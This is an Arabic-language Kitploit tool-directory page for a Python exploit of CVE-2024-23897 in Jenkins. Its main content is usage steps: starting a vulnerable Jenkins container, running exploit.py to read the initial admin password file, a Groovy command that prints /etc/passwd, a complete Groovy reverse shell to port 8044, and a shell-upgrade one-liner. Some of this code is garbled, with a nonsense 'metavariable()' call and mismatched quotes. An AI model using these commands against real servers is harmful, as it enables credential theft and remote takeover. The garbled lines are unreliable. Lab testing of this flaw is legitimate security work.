Skip to content
KitploitKITPLOIT
أدواتالمدونة
إرسال
أدواتالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

··الخلاصات·اتصال·الخصوصية·© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
Exploit-CVE-2024-23897 — استغلال قائم على بايثون لـ CVE-2024-23897 يستهدف Jenkins مع قراءة الملفات وتنفيذ التعليمات البرمجية عن بُعد عبر سكريبت Groovy، بما في ذلك قشرة تفاعلية وقدرات القشرة العكسية. | Kitploit
أدوات/GitHubGitHub/aadi0258/exploit-cve-2024-23897
تحليل الثغرات الأمنيةالاستغلالشيل كوداستغلال تطبيقات الويباختبار الاختراقأداة الوصول عن بعد
GitHubaadi0258/exploit-cve-2024-23897

Exploit-CVE-2024-23897

استغلال قائم على بايثون لـ CVE-2024-23897 يستهدف Jenkins مع قراءة الملفات وتنفيذ التعليمات البرمجية عن بُعد عبر سكريبت Groovy، بما في ذلك قشرة تفاعلية وقدرات القشرة العكسية.

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
مشاركة
عرض المستودع
منذ 9 أشهرلم تتم المراجعة بعد

Exploit-CVE-2024-23897

تشغيل الحاوية

docker run -p 8080:8080 --name vulnerable-jenkins -d jenkins/jenkins:2.441-jdk17

التحقق من السجلات

docker logs <machine_name>

الحصول على عنوان IP لحاوية docker

docker inspect vulnerable-jenkins | grep IPAddress

#كود الاستغلال: python3 exploit.py --target http://127.0.0.1:8080 --file /var/jenkins_home/secrets/initialAdminPassword --request-timeout 30

سكريبت Groovy:

println "cat /etc/passwd".execute().text

RCE

String host="localhost"; int port=8044; String cmd="cmd.exe"; Process p=new ProcessBuilder(cmd).redirectErrorStream(true).start();Socket s=new Socket(host,port);InputStream pi=p.getInputStream(),pe=p.getErrorStream(), si=s.getInputStream();OutputStream po=p.getOutputStream(),so=s.getOutputStream();while(!s.isClosed()){while(pi.available()>0)so.write(pi.read());while(metavariable()>0)so.write(pe.read());while(si.available()>0)po.write(si.read());so.flush();po.flush();Thread.sleep(50);try {p.exitValue();break;}catch (Exception e){}};p.destroy();s.close();

لتعيين متغيرات البيئة

export TERM=xterm

#للشيل التفاعلي python -c 'import pty'; pty.spawn("/bin/bash")'

تنزيل الأداة